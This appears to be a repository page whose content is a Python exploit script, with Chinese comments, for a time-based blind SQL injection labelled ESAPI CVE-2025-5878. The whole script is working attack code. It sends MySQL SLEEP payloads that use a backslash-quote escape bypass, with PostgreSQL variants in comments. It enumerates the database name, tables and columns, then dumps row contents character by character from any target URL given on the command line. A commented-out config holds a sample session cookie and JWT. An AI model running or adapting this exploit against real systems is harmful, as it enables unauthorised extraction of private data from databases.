README.md
Rendering markdown...
import argparse
import re
import sys
import requests
import time
import string
# 目标配置
# url = "http://192.168.122.1:8888/vulnapi/sqli/jdbc/safe3"
# param_name = "id"
# cookies = {"JSESSIONID=70D53458ADD0D92F6BE69DC0F13DF22F;JWT_TOKEN=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpYXQiOjE3ODA2NDY5NDgsImV4cCI6MTc4MDczMzM0OCwidXNlcm5hbWUiOiJhZG1pbiJ9.FLQCMsMxCgYOvMoU5k7KDLlv-jIgBw8zKzDrwEUBTR4"}
# 延时判断阈值(秒)
# self.sleep_time = 5
# timeout = 3
class ESAPISQLExploit:
def __init__(self, url, cookies, headers):
self.param_name = self._extract_param_name(url)
self.url = url.split('?')[0]
self.cookies = self._parse_cookies(cookies) if cookies else {}
self.headers = headers
self.timeout = 3
self.sleep_time = 5
def _extract_param_name(self,url):
"""提取 ? 和 = 之间的参数名"""
# 方法1:正则表达式
match = re.search(r'\?([^=]+)=', url)
if match:
return match.group(1)
def _parse_cookies(self, cookie_str):
"""
解析cookie字符串为字典
Args:
cookie_str: "name1=value1; name2=value2" 格式的字符串
Returns:
dict: cookie字典
"""
cookies = {}
if isinstance(cookie_str, str):
# 分割多个cookie
for item in cookie_str.split(';'):
item = item.strip()
if '=' in item:
key, value = item.split('=', 1)
cookies[key.strip()] = value.strip()
elif isinstance(cookie_str, dict):
# 如果已经是字典,直接使用
cookies = cookie_str
return cookies
def has_sleep(self,payload):
"""判断payload是否触发延时"""
paramsDouble = {self.param_name: payload}
start = time.time()
try:
response = requests.get(url=self.url, params = paramsDouble, cookies = self.cookies, headers=self.headers, timeout=self.timeout)
elapsed = time.time() - start
return elapsed >= self.sleep_time
except requests.Timeout:
# 超时也可能表示触发延时,根据实际情况判断
return True
def calc_length(self):
lengthTemp = 0
for i in range(1, 50):
# 示例payload:MySQL
payload = f"1\\' AND IF(length(database())>{i},0,SLEEP({self.sleep_time}))-- -"
# PostgreSQL 版本
# payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -"
if self.has_sleep(payload):
print(f"\n数据库长度{i}")
lengthTemp = i
break
return lengthTemp
def inject_database_name(self, lengthTemp):
"""获取数据库名"""
db_name = ""
print("[*] 开始获取数据库名...")
for i in range(1, lengthTemp + 1):
for c in range(45,123):
# 示例payload:MySQL
payload = f"1\\' AND IF(ascii(SUBSTRING(database(),{i},1))>{c},0,SLEEP({self.sleep_time}))-- -"
# PostgreSQL 版本
# payload = f"1%5c' AND CASE WHEN (SUBSTRING(current_database(),{i},1)='{c}') THEN pg_sleep({self.sleep_time}) ELSE NULL END-- -"
print(f"\r[*] 正在猜测第 {i} 位: {chr(c)}", end="")
if self.has_sleep(payload):
db_name += chr(c)
print(f"\n[+] 第 {i} 位: {chr(c)}")
break
print(f"\n[+] 数据库名: {db_name}")
return db_name
def inject_table_name(self, db_name):
"""获取表名"""
tables = []
print(f"\n[*] 开始获取 {db_name} 库的表名...")
# 先获取表数量
table_count = 0
for i in range(1, 20):
payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.tables WHERE table_schema=\"{db_name}\")>={i},SLEEP({self.sleep_time}),0)-- -"
if self.has_sleep(payload):
table_count = i
else:
break
print(f"[+] 共发现 {table_count} 个表")
# 逐个获取表名
for t in range(1, table_count + 1):
table_name = ""
for i in range(1, 50):
for c in string.ascii_lowercase + string.digits + "_":
payload = f"1\\' AND IF(SUBSTRING((SELECT table_name FROM information_schema.tables WHERE table_schema=\"{db_name}\" LIMIT {t - 1},1),{i},1)=\"{c}\",SLEEP({self.sleep_time}),0)-- -"
print(f"\r[*] 第 {t} 个表: {table_name}{c}", end="")
if self.has_sleep(payload):
table_name += c
print(f"\n[+] 第 {t} 个表第 {i} 位: {c}")
break
else:
break
tables.append(table_name)
print(f"\n[+] 表名列表: {tables}")
return tables
def inject_column_name(self, database_name, table_name):
"""获取列名"""
columns = []
print(f"\n[*] 开始获取 {table_name} 表的列名...")
# 获取列数量
col_count = 0
for i in range(1, 30):
payload = f"1\\' AND IF((SELECT COUNT(*) FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\")>={i},SLEEP({self.sleep_time}),0)-- -"
if self.has_sleep(payload):
col_count = i
else:
break
print(f"[+] 共发现 {col_count} 个列")
# 逐个获取列名
for c in range(1, col_count + 1):
col_name = ""
for i in range(1, 50):
for ch in string.ascii_lowercase + string.digits + "_":
payload = f"1\\' AND IF(SUBSTRING((SELECT column_name FROM information_schema.columns WHERE table_name=\"{table_name}\" and table_schema=\"{database_name}\" LIMIT {c - 1},1),{i},1)=\"{ch}\",SLEEP({self.sleep_time}),0)-- -"
print(f"\r[*] 第 {c} 个列: {col_name}{ch}", end="")
if self.has_sleep(payload):
col_name += ch
print(f"\n[+] 第 {c} 个列第 {i} 位: {ch}")
break
else:
break
columns.append(col_name)
print(f"\n[+] 列名列表: {columns}")
return columns
def inject_data(self, table_name, column_name):
"""获取数据"""
data_list = []
print(f"\n[*] 开始获取 {table_name}.{column_name} 数据...")
# 先获取行数
row_count = 0
for i in range(1, 100):
payload = f"1\\' AND IF((SELECT COUNT(*) FROM {table_name})>={i},SLEEP({self.sleep_time}),0)-- -"
if self.has_sleep(payload):
row_count = i
else:
break
print(f"[+] 共发现 {row_count} 行数据")
# 逐个获取每行的数据长度和数据
for r in range(1, row_count + 1):
# 先获取该行数据的长度
data_len = 0
for i in range(1, 256):
payload = f"1\\' AND IF((SELECT LENGTH({column_name}) FROM {table_name} LIMIT {r - 1},1)<={i},SLEEP({self.sleep_time}),0)-- -"
if self.has_sleep(payload):
data_len = i
break
print(f"[*] 第 {r} 行数据长度为: {data_len}")
# 逐位获取数据
data = ""
for i in range(1, data_len + 1):
for ch in string.printable:
if ch == "'":
continue
# 使用 ASCII 码判断(更稳定)
payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))={ord(ch)},SLEEP({self.sleep_time}),0)-- -"
print(f"\r[*] 第 {r} 行数据: {data}{ch}", end="")
if self.has_sleep(payload):
data += ch
break
else:
# 如果找不到,尝试二分法搜索ASCII
low, high = 32, 126
while low <= high:
mid = (low + high) // 2
payload = f"1\\' AND IF(ASCII(SUBSTRING((SELECT {column_name} FROM {table_name} LIMIT {r - 1},1),{i},1))>={mid},SLEEP({self.sleep_time}),0)-- -"
if self.has_sleep(payload):
low = mid + 1
else:
high = mid - 1
ascii_val = high
if ascii_val >= 32:
data += chr(ascii_val)
print(f"\r[*] 第 {r} 行数据: {data}", end="")
break
data_list.append(data)
print(f"\n[+] 第 {r} 行数据: {data}")
print(f"\n[+] 数据为: {data_list}")
return data_list
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="ESAPI SQLinjection CVE-2025-5878 Exploit")
parser.add_argument("-u", "--url", required=True, help="base URL (ej: http://target.com:3000?id=1)")
parser.add_argument("-c", "--cookie", required=True,help="Cookie字符串,格式: 'name1=value1; name2=value2'")
parser.add_argument("--dbs", action="store_true", help="获取数据库名称")
parser.add_argument("--tables", action="store_true", help="获取表名")
parser.add_argument("--columns", action="store_true", help="获取指定表的列名(需要先执行-T)")
parser.add_argument("-D", "--db", help="指定数据库名称")
parser.add_argument("-T", "--table", help="指定获取表名")
parser.add_argument("-C", "--column", help="获取指定表的列名(需要先执行-T)")
parser.add_argument("--dump", action="store_true",help="导出指定表的数据(格式: 表名,列名1,列名2)")
args = parser.parse_args()
# 验证URL格式
if not args.url or '?' not in args.url or '=' not in args.url:
print("[-] 错误:URL必须包含 '?' 和 '=' 参数")
print(f" 示例: {args.url}?id=1")
sys.exit(1)
headers = {"User-Agent": "Mozilla/5.0"}
# 初始化exploit对象
exploit = ESAPISQLExploit(url= args.url, cookies= args.cookie, headers=headers)
# 显示目标信息
print(f"[*] 目标URL: {args.url}")
if args.cookie:
print(f"[*] 使用Cookie: {args.cookie}")
# 执行顺序检查:必须先执行-T才能执行-C
if args.column and not args.table:
print("[-] 错误:必须先使用 -T 获取表名,才能使用 -C 获取列名")
print(" 正确顺序: python exploit.py -u <url> -T # 先获取表名")
print(" python exploit.py -u <url> -C <table_name> # 再获取列名")
sys.exit(1)
length = 10
# 执行命令
if args.dbs:
length = exploit.calc_length()
exploit.inject_database_name(length)
else:
if args.db is not None:
if args.tables:
exploit.inject_table_name(args.db)
else:
if args.table is not None:
if args.columns:
exploit.inject_column_name(args.db, args.table)
else:
if args.column is not None:
if args.dump:
exploit.inject_data(args.table, args.column)
else:
print("请先爆破列名或指定列名")
else:
print("请先爆破表名或指定表库名")
else:
print("请先爆破数据库名或指定数据库名")